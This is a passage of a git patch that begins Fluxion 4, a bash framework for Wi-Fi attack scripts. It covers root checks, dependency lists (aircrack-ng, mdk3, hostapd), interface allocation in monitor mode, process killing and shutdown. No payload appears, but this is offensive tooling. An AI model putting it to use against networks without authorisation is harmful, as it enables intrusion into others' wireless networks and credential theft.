From 0dd1e084c8dae42d1ca53b52428d58b88498b3f0 Mon Sep 17 00:00:00 2001
From: Matias Barcenas
Date: Fri, 5 Jan 2018 18:32:57 -0600
Subject: [PATCH 01/45] Started fluxion 4 development. This version will focus on providing robust services for the attack scripts. Development and migration will happen in the new "fluxion" script file. The following are currently being implemented, or have been implemented:
* Core fluxion globals, including paths and workspace.
* Core sanity checks, including xterm and super user checks.
* Core library includes & library scripts' configuration.
* Command line interface parameter parsing & loading.
* User preferences importing, loading, & handling.
* Configurables (prefererences & CLI flags) are properly handled.
* Fluxion startup and shutdown behaviour refactored.
* Handler subroutines are loaded & configured properly.
* A small sequencing framework, to refactor some run-loops.
* A small universal interface-allocation & retrival framework.
* A couple of fluxion used helper subroutines.
* A candidate fluxion run-loop.
---
 fluxion | 857 ++++++++++++++++++++++++++++++++++++++++++
 language/en.sh | 14 +-
 lib/InterfaceUtils.sh | 39 +-
 3 files changed, 896 insertions(+), 14 deletions(-)
 create mode 100755 fluxion
diff --git a/fluxion b/fluxion
new file mode 100755
index 0000000..cd71421
--- /dev/null
+++ b/fluxion
@@ -0,0 +1,857 @@
+#!/bin/bash
+
+# ============================================================ #
+# ================== < FLUXION Parameters > ================== #
+# ============================================================ #
+# Warning: The FLUXIONPath constant will be incorrectly set when
+# called directly via a system link. System links in the path to
+# the script, however, will be loaded correctly.
+
+# Path to directory containing the FLUXION executable script.
+declare -r FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P)
+
+# Path to the temp. directory available to FLUXION & subscripts.
+declare -r FLUXIONWorkspacePath="/tmp/fluxspace"
+
+# Path to FLUXION's preferences file, to be loaded afterward.
+declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.sh"
+
+# Constants denoting the reference noise floor & ceiling levels.
+# These are used by the the wireless network scanner visualizer.
+declare -r FLUXIONNoiseFloor=-90
+declare -r FLUXIONNoiseCeiling=-60
+
+declare -r FLUXIONVersion=4
+declare -r FLUXIONRevision=0
+
+
+# ============================================================ #
+# ================= < Script Sanity Checks > ================= #
+# ============================================================ #
+if [ $EUID -ne 0 ] # Super User Check
+ then echo -e "Aborted, please execute the script as root."; exit 1
+fi
+
+# ===================== < XTerm Checks > ===================== #
+if [ ! "${DISPLAY:-}" ] # Assure display is available.
+ then echo -e "Aborted, X (graphical) session unavailable."; exit 2
+fi
+
+if ! hash xdpyinfo 2>/dev/null # Assure display probe possible.
+ then echo -e "Aborted, xdpyinfo is unavailable."; exit 3
+fi
+
+if ! xdpyinfo &>/dev/null # Assure display info is available.
+ then echo -e "Aborted, xterm test session failed."; exit 3
+fi
+
+# ================ < Parameter Parser Check > ================ #
+getopt --test > /dev/null # Assure enhanced getopt (returns 4).
+if [ $? -ne 4 ]
+ then echo "Aborted, enhanced getopt isn't available."; exit 4
+fi
+
+# =============== < Working Directory Check > ================ #
+if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null
+ then echo "Aborted, can't generate a workspace directory."; exit 5
+fi
+
+# Once sanity check is passed, we can start to load everything.
+
+
+# ============================================================ #
+# =================== < Library Includes > =================== #
+# ============================================================ #
+source lib/installer/InstallerUtils.sh
+source lib/InterfaceUtils.sh
+source lib/SandboxUtils.sh
+source lib/FormatUtils.sh
+source lib/ColorUtils.sh
+source lib/IOUtils.sh
+source lib/HashUtils.sh
+
+# NOTE: These are configured after arguments are loaded (later).
+
+
+# ============================================================ #
+# =================== < Parse Parameters > =================== #
+# ============================================================ #
+if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@")
+ then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5
+fi
+
+declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments
+
+
+# ============================================================ #
+# ================== < Load Configurables > ================== #
+# ============================================================ #
+
+# ============= < Argument Loaded Configurables > ============ #
+eval set -- "$FLUXIONCLIArguments" # Set environment parameters.
+
+[ "$1" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI.
+
+while [ "$1" != "--" ]; do
+ case "$1" in
+ -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;;
+ -d|--debug) declare -r FLUXIONDebug=1;;
+ -k|--killer) declare -r FLUXIONWIKillProcesses=1;;
+ -r|--reloader) declare -r FLUXIONWIReloadDriver=1;;
+ -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;;
+ -l|--language) FLUXIONLanguage=$2; shift;;
+ -a|--attack) FLUXIONAttack=$2; shift;;
+ esac
+ shift # Shift new parameters
+done
+
+shift # Remove "--" to prepare for attacks to read parameters.
+# Executable arguments are handled after subroutine definition.
+
+# =================== < User Preferences > =================== #
+# Load user-defined preferences if there's an executable script.
+# WARNING: Preferences file must assure no redeclared constants.
+if [ -x "$FLUXIONPreferencesFile" ]
+ then source "$FLUXIONPreferencesFile"
+fi
+
+# ================ < Configurable Constants > ================ #
+if [ "$FLUXIONAuto" != "1" ] # If defined, assure 1.
+ then declare -r FLUXIONAuto=${FLUXIONAuto:+1}
+fi
+
+if [ "$FLUXIONDebug" != "1" ] # If defined, assure 1.
+ then declare -r FLUXIONDebug=${FLUXIONDebug:+1}
+fi
+
+if [ "$FLUXIONAirmonNG" != "1" ] # If defined, assure 1.
+ then declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1}
+fi
+
+if [ "$FLUXIONWIKillProcesses" != "1" ] # If defined, assure 1.
+ then declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1}
+fi
+
+if [ "$FLUXIONWIReloadDriver" != "1" ] # If defined, assure 1.
+ then declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1}
+fi
+
+# FLUXIONDebug [Normal Mode "" / Developer Mode 1]
+if [ $FLUXIONDebug ]; then
+ declare -r FLUXIONOutputDevice="/dev/stdout"
+ declare -r FLUXIONHoldXterm="-hold"
+else
+ declare -r FLUXIONOutputDevice="/dev/null"
+ declare -r FLUXIONHoldXterm=""
+fi
+
+# ================ < Configurable Variables > ================ #
+declare -r FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr "
+FLUXIONPrompt=$FLUXIONPromptDefault
+
+declare -r FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr"
+FLUXIONVLine=$FLUXIONVLineDefault
+
+# ================== < Library Parameters > ================== #
+declare -r InterfaceUtilsOutputDevice="$FLUXIONOutputDevice"
+
+declare -r SandboxWorkspacePath="$FLUXIONWorkspacePath"
+declare -r SandboxOutputDevice="$FLUXIONOutputDevice"
+
+declare -r InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath"
+declare -r InstallerUtilsOutputDevice="$FLUXIONOutputDevice"
+declare -r InstallerUtilsNoticeMark="$FLUXIONVLine"
+
+declare -r PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log"
+
+declare -r IOUtilsHeader="fluxion_header"
+declare -r IOUtilsQueryMark="$FLUXIONVLine"
+declare -r IOUtilsPrompt="$FLUXIONPrompt"
+
+declare -r HashOutputDevice="$FLUXIONOutputDevice"
+
+
+# ============================================================ #
+# =================== < Default Language > =================== #
+# ============================================================ #
+# Set by default in case fluxion is aborted before setting one.
+source "$FLUXIONPath/language/en.sh"
+
+
+# ============================================================ #
+# ================== < Startup & Shutdown > ================== #
+# ============================================================ #
+function fluxion_startup() {
+ if [ "$FLUXIONDebug" ]; then return 1; fi
+
+ FLUXIONBanner=()
+
+ format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐"
+ FLUXIONBanner+=("$FormatCenterLiterals")
+ format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║"
+ FLUXIONBanner+=("$FormatCenterLiterals")
+ format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜"
+ FLUXIONBanner+=("$FormatCenterLiterals")
+ format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║"
+ FLUXIONBanner+=("$FormatCenterLiterals")
+ format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘"
+ FLUXIONBanner+=("$FormatCenterLiterals")
+ format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯"
+ FLUXIONBanner+=("$FormatCenterLiterals")
+
+ clear
+
+ if [ "$FLUXIONAuto" ]
+ then echo -e "$CBlu"
+ else echo -e "$CRed"
+ fi
+
+ for line in "${FLUXIONBanner[@]}"
+ do echo "$line"; sleep 0.05
+ done
+
+ echo # Do not remove.
+
+ sleep 0.1
+ format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr"
+ echo -e "$FormatCenterLiterals"
+
+ sleep 0.1
+ format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost"
+ echo -e "$FormatCenterLiterals"
+
+ sleep 0.1
+ if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision
+ then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")"
+ fi
+
+ echo # Do not remove.
+
+ FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc")
+ FLUXIONCLIToolsMissing=()
+
+ while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@]
+ do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@]
+ done
+
+ echo -e "\n\n" # This echo is for spacing
+}
+
+function fluxion_shutdown() {
+ if [ $FLUXIONDebug ]; then return 1; fi
+
+ # Show the header if the subroutine has already been loaded.
+ if type -t fluxion_header &> /dev/null
+ then fluxion_header
+ fi
+
+ echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr"
+
+ # List currently running processes which we might have to kill before exiting.
+ local processes
+ readarray processes < <(ps -A)
+
+ # Currently, fluxion is only responsible for killing airodump-ng, since
+ # fluxion explicitly uses it to scan for candidate target access points.
+ # NOTICE: Processes started by subscripts, such as an attack script,
+ # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler.
+ local -r targets=("airodump-ng")
+
+ local targetID # Program identifier/title
+ for targetID in "${targets[@]}"; do
+ # Get PIDs of all programs matching targetPID
+ local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}')
+ if [ ! "$targetPID" ]; then continue; fi
+ echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`"
+ kill -s SIGKILL $targetPID &> $FLUXIONOutputDevice
+ done
+
+ # Assure changes are reverted if installer was activated.
+ if [ "$PackageManagerCLT" ]; then
+ echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr"
+ unprep_package_manager
+ fi
+
+ # If allocated interfaces exist, deallocate them now.
+ if [ ${#FluxionInterfaces[@]} -gt 0 ]; then
+ echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice"
+
+ local interface
+ for interface in "${!FluxionInterfaces[@]}"; do
+ # Only deallocate fluxion or airmon-ng created interfaces.
+ if [[ "$interface" == "flux"* || "$interface" == *"mon"* ]]; then
+ echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $interface$CClr"
+ fluxion_deallocate_interface $interface
+ fi
+ done
+ fi
+
+ echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr"
+ tput cnorm
+
+ if [ ! $FLUXIONDebug ]; then
+ echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr"
+ sandbox_remove_workfile "$FLUXIONWorkspacePath/*"
+ fi
+
+ if [ $FLUXIONWIKillProcesses ]; then
+ echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr"
+
+ # TODO: Add support for other network managers (wpa_supplicant?).
+ if [ $(which systemctl) ]; then
+ service network-manager restart &> $FLUXIONOutputDevice &
+ service networkmanager restart &> $FLUXIONOutputDevice &
+ service networking restart &> $FLUXIONOutputDevice &
+ else
+ systemctl restart network-manager.service &> $FLUXIONOutputDevice &
+ fi
+ fi
+
+ echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr"
+ echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr"
+
+ sleep 3
+
+ clear
+
+ exit 0
+}
+
+
+# ============================================================ #
+# ================= < Handler Subroutines > ================== #
+# ============================================================ #
+# Delete log only in Normal Mode !
+function fluxion_conditional_clear() {
+ # Clear iff we're not in debug mode
+ if [ ! $FLUXIONDebug ]; then clear; fi
+}
+
+function fluxion_conditional_bail() {
+ echo ${1:-"Something went wrong, whoops! (report this)"}
+ sleep 5
+ if [ ! $FLUXIONDebug ]; then
+ fluxion_handle_exit
+ return 1
+ fi
+ echo "Press any key to continue execution..."
+ read bullshit
+}
+
+# ERROR Report only in Developer Mode
+if [ $FLUXIONDebug ]
+ function fluxion_error_report() {
+ echo "Exception caught @ line #$1"
+ }
+
+ then trap 'fluxion_error_report $LINENO' ERR
+fi
+
+function fluxion_handle_abort_attack() {
+ if [ $(type -t stop_attack) ]; then
+ stop_attack &> $FLUXIONOutputDevice
+ unprep_attack &> $FLUXIONOutputDevice
+ else
+ echo "Attack undefined, can't stop anything..." > $FLUXIONOutputDevice
+ fi
+}
+
+# In case of abort signal, abort any attacks currently running.
+trap fluxion_handle_abort_attack SIGABRT
+
+function fluxion_handle_exit() {
+ fluxion_handle_abort_attack
+ fluxion_shutdown
+ exit 1
+}
+
+# In case of unexpected termination, run fluxion_shutdown.
+trap fluxion_handle_exit SIGINT SIGHUP
+
+
+# ============================================================ #
+# =============== < Resolution & Positioning > =============== #
+# ============================================================ #
+function fluxion_set_resolution() { # Windows + Resolution
+ # Calc options
+ RATIO=4
+
+ # Get demensions
+ SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(")
+ SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}'))
+ SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}'))
+
+ PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc)
+ NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc)
+ NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc)
+
+ NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc)
+ NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc)
+
+ SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2)))
+ SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2)))
+
+ # Upper
+ TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0"
+ TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0"
+ TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0"
+
+ # Lower
+ BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0"
+ BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0"
+ BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0"
+
+ # Y mid
+ LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y"
+ RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y"
+
+ # Big
+ TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0"
+ TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0"
+}
+
+
+# ============================================================ #
+# ================= < Sequencing Framework > ================= #
+# ============================================================ #
+# The following lists some problems with the framework's design.
+# The list below is a list of DESIGN FLAWS, not framework bugs.
+# * Sequenced undo instructions' return value is being ignored.
+# * A global is generated for every new namespace being used.
+# * It uses eval too much, but it's bash, so that's not so bad.
+# TODO: Try to fix this or come up with a better alternative.
+declare -rA FLUXIONUndoable=( \
+ ["set"]="unset" \
+ ["prep"]="unprep" \
+ ["run"]="halt" \
+ ["start"]="stop" \
+)
+
+function fluxion_do() {
+ if [ ${#@} -lt 2 ]; then return -1; fi
+
+ local -r namespace=$1
+ local -r identifier=$2
+
+ eval FXDLog_$namespace+=\("$identifier"\)
+ eval ${namespace}_$identifier "${@:3}"
+ return $?
+}
+
+function fluxion_undo() {
+ if [ ${#@} -ne 1 ]; then return -1; fi
+
+ local -r namespace=$1
+
+ eval local -r history=\("\${FXDLog_$namespace[@]}"\)
+
+ local i
+ for (( i=${#history[@]}; i > 0; i-- )); do
+ local -r instruction=${history[i-1]}
+ local -r command=${instruction%%_*}
+ local -r identifier=${instruction#*_}
+ if eval ${namespace}_${FLUXIONUndoable["$command"]}_$identifier; then
+ eval FXDLog_$namespace=\("${history[@]::$i}"\)
+ return 0
+ fi
+ done
+
+ return -2 # The undo-chain failed.
+}
+
+function fluxion_done() {
+ eval "FluxionDone=\${FXDLog_$namespace[-1]}"
+ [ ! $FluxionDone ] && return 1
+}
+
+function fluxion_done_reset() {
+ if [ ${#@} -ne 1 ]; then return -1; fi
+ local -r namespace=$1
+ eval FXDLog_$namespace=\(\)
+}
+
+function fluxion_do_sequence() {
+ if [ ${#@} -ne 2 ]; then return -1; fi
+
+ # TODO: Implement an alternative, better method of doing
+ # what this subroutine does, maybe using for-loop iteration.
+ # The for-loop implementation must support the subroutines
+ # defined above, including updating the namespace tracker.
+
+ local -r namespace=$1
+ local -r sequence=("${!2}")
+
+ if [ ${#sequence[@]} -eq 0 ]; then return -2; fi
+
+ local -A index=()
+
+ local i
+ for i in $(seq ${#sequence[@]}); do
+ index["${sequence[i-1]}"]=$i
+ done
+
+ local instruction=${sequence[0]}
+ while [ "$instruction" ]; do
+ if ! fluxion_do $namespace $instruction; then
+ if ! fluxion_undo $namespace
+ then break
+ fi
+ fi
+
+ if ! fluxion_done; then return -3; fi
+
+ local instructionIndex=${index["$FluxionDone"]}
+
+ if [ ! "$instructionIndex" ]; then return -4; fi
+
+ instruction=${sequence["$instructionIndex"]}
+ done
+}
+
+
+# ============================================================ #
+# ================= < Load All Subroutines > ================= #
+# ============================================================ #
+function fluxion_header() {
+ format_apply_autosize "[%*s]\n"
+ local verticalBorder=$FormatApplyAutosize
+
+ format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n"
+ local headerTextFormat="$FormatApplyAutosize"
+
+ fluxion_conditional_clear
+
+ echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")"
+ printf "$CSRed$verticalBorder" ""
+ printf "$headerTextFormat" "" ""
+ printf "$CSBlu$verticalBorder" ""
+ echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr"
+ echo
+ echo
+}
+
+# ======================= < Language > ======================= #
+function fluxion_unset_language() {
+ FLUXIONLanguage=""
+}
+
+function fluxion_set_language() {
+ if [ ! "$FLUXIONLanguage" ]; then
+ if [ "$FLUXIONAuto" ]; then
+ FLUXIONLanguage="en"
+ else
+ # Get all languages available.
+ local languageCodes
+ readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//')
+
+ local languages
+ readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //')
+
+ io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@]
+
+ FLUXIONLanguage=${IOQueryFormatFields[0]}
+
+ echo # Do not remove.
+ fi
+ fi
+
+ # Check if all language files are present for the selected language.
+ find -type d -name language | while read language_dir; do
+ if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then
+ echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:"
+ echo -e "\t$language_dir/${FLUXIONLanguage}.sh"
+ return 1
+ fi
+ done
+
+ if [ $? -eq 1 ]; then # If a file is missing, fall back to english.
+ echo -e "\n\n$FLUXIONVLine Falling back to English..."; sleep 5
+ FLUXIONLanguage="en"
+ fi
+
+ source "$FLUXIONPath/language/$FLUXIONLanguage.sh"
+}
+
+# ====================== < Interfaces > ====================== #
+declare -A FluxionInterfaces=() # Global interfaces' registry.
+
+function fluxion_deallocate_interface() { # Release interfaces
+ if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi
+
+ local -r oldIdentifier=$1
+ local -r newIdentifier=${FluxionInterfaces[$oldIdentifier]}
+
+ # Assure the interface is in the allocation table.
+ if [ ! "$newIdentifier" ]; then return 2; fi
+
+ if interface_is_wireless $oldInterface; then
+ # Unblock interfaces to make them available.
+ echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice"
+ rfkill unblock all &> $FLUXIONOutputDevice
+
+ # Attempt deactivating monitor mode on the interface.
+ if interface_set_mode $oldIdentifier managed
+ then return 3
+ fi
+ fi
+
+ # If interface was allocated by airmon-ng, deallocate with it.
+ if [[ "$oldIdentifier" == *"mon"* ]]; then
+ if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice
+ then return 4
+ fi
+ else
+ # Attempt to restore the original interface identifier.
+ if ! interface_reidentify $oldIdentifier $newIdentifier
+ then return 5
+ fi
+ fi
+
+ # Once successfully renamed, remove from allocation table.
+ unset FluxionInterfaces[$oldIdentifier]
+ unset FluxionInterfaces[$newIdentifier]
+}
+
+function fluxion_allocate_interface() { # Reserve interfaces
+ if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi
+
+ local -r identifier=$1
+
+ # If the interface is already in allocation table, return it.
+ if [ "${FluxionInterfaces[$identifier]+x}" ]; then
+ FluxionInterface=${FluxionInterfaces[$identifier]}
+ return 0
+ fi
+
+ echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice"
+
+ if interface_is_wireless $identifier; then
+ # Unblock wireless interfaces to make them available.
+ echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice"
+ rfkill unblock all &> $FLUXIONOutputDevice
+
+ if [ "$FLUXIONWIReloadDriver" ]; then
+ # Get selected interface's driver details/info-descriptor.
+ echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice"
+
+ if ! interface_driver "$identifier"; then
+ echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError"
+ sleep 3
+ return 2
+ fi
+
+ # Notice: This local is function-scoped, not block-scoped.
+ local -r driver="$InterfaceDriver"
+
+ # Unload the driver module from the kernel.
+ rmmod -f $driver &> $FLUXIONOutputDevice
+
+ # Wait while interface becomes unavailable.
+ echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONUnloadingWIDriverNotice`"
+ while interface_physical "$identifier"
+ do sleep 1
+ done
+ fi
+
+ if [ "$FLUXIONWIKillProcesses" ]; then
+ # Get list of potentially troublesome programs.
+ echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice"
+
+ # Kill potentially troublesome programs.
+ echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice"
+
+ # TODO: Make the loop below airmon-ng independent.
+ # Maybe replace it with a list of network-managers?
+ # WARNING: Version differences could break code below.
+ for program in "`airmon-ng check | awk 'NR>6{print $2}'`"
+ do killall "$program" &> $FLUXIONOutputDevice
+ done
+ fi
+
+ if [ "$FLUXIONWIReloadDriver" ]; then
+ # Reload the driver module into the kernel.
+ modprobe "$driver" &> $FLUXIONOutputDevice
+
+ # Wait while interface becomes available.
+ echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONLoadingWIDriverNotice`"
+ while ! interface_physical "$identifier"
+ do sleep 1
+ done
+ fi
+
+ # Set wireless flag to prevent having to re-query.
+ local -r allocatingWirelessInterface=1
+ fi
+
+ # If we're using the interface library, reidentify now.
+ # If usuing airmon-ng, let airmon-ng rename the interface.
+ if [ ! $FLUXIONAirmonNG ]; then
+ echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface"
+
+ if [ $allocatingWirelessInterface ]
+ # Prevent interface-snatching by renaming the interface.
+ then interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]}
+ else interface_reidentify $identifier fluxet${#FluxionInterfaces[@]}
+ fi
+
+ if [ $? -ne 0 ] # If reidentifying failed, abort immediately.
+ then return 3
+ fi
+ fi
+
+ if [ $allocatingWirelessInterface ]; then
+ # Activate wireless interface monitor mode and save identifier.
+ echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice"
+
+ # TODO: Consider the airmon-ng flag is set, monitor mode is
+ # already enabled on the interface being allocated, and the
+ # interface identifier is something non-airmon-ng standard.
+ # The interface could already be in use by something else.
+ # Snatching or crashing interface issues could occur.
+
+ # NOTICE: Conditionals below populate newIdentifier on success.
+ if [ $FLUXIONAirmonNG ]; then
+ local -r newIdentifier=$(airmon-ng start $identifier | grep "monitor .* enabled" | grep -oP "wl.*mon|mon[0-9]+")
+ else
+ # Attempt activating monitor mode on the interface.
+ if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor
+ # Register the new identifier upon consecutive successes.
+ then local -r newIdentifier=fluxwl${#FluxionInterfaces[@]}
+ # If monitor-mode switch fails, undo rename and abort.
+ else interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier
+ fi
+ fi
+ fi
+
+ # On failure to allocate the interface, we've got to abort.
+ # Notice: If the interface was already in monitor mode and
+ # airmon-ng is activated, WE didn't allocate the interface.
+ if [ ! "$newIdentifier" -o "$newIdentifier" = "$oldIdentifier" ]; then
+ echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocationFailedError"
+ sleep 3
+ return 4
+ fi
+
+ # Register identifiers to allocation hash table.
+ FluxionInterfaces[$newIdentifier]=$identifier
+ FluxionInterfaces[$identifier]=$newIdentifier
+
+ echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocatedNotice"
+ sleep 3
+
+ # Notice: Interfaces are accessed with their original identifier
+ # as the key for the global FluxionInterfaces hash/map/dictionary.
+}
+
+function fluxion_get_interface() {
+ if [[ "$1" != *"[@]" ]]; then return 1; fi
+
+ local interfacesAvailable=("${!1}")
+ local interfacesAvailableInfo=()
+ local interfacesAvailableColor=()
+ local interfacesAvailableState=()
+
+ # Gather information from all available interfaces.
+ local interfaceCandidate
+ for interfaceCandidate in "${interfacesAvailable[@]}"; do
+ interface_chipset "$interfaceCandidate"
+ interfacesAvailableInfo+=("$InterfaceChipset")
+
+ # If it has already been allocated, we can use it at will.
+ if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then
+ interfacesAvailableColor+=("$CGrn")
+ interfacesAvailableState+=("[*]")
+ else
+ interface_state "$interfaceCandidate"
+
+ if [ "$InterfaceState" = "up" ]; then
+ interfacesAvailableColor+=("$CPrp")
+ interfacesAvailableState+=("[-]")
+ else
+ interfacesAvailableColor+=("$CClr")
+ interfacesAvailableState+=("[+]")
+ fi
+ fi
+ done
+
+ # If only one interface exists and it's not unavailable, choose it.
+ if [ "${#interfacesAvailable[@]}" -eq 1 -a \
+ "${interfacesAvailableState[0]}" != "[-]" ]; then
+ FluxionGetInterfaceSelected="${interfacesAvailable[0]}"
+ FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}"
+ FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}"
+ else
+ interfacesAvailable+=( \
+ "$FLUXIONGeneralRepeatOption" \
+ "$FLUXIONGeneralBackOption" \
+ )
+
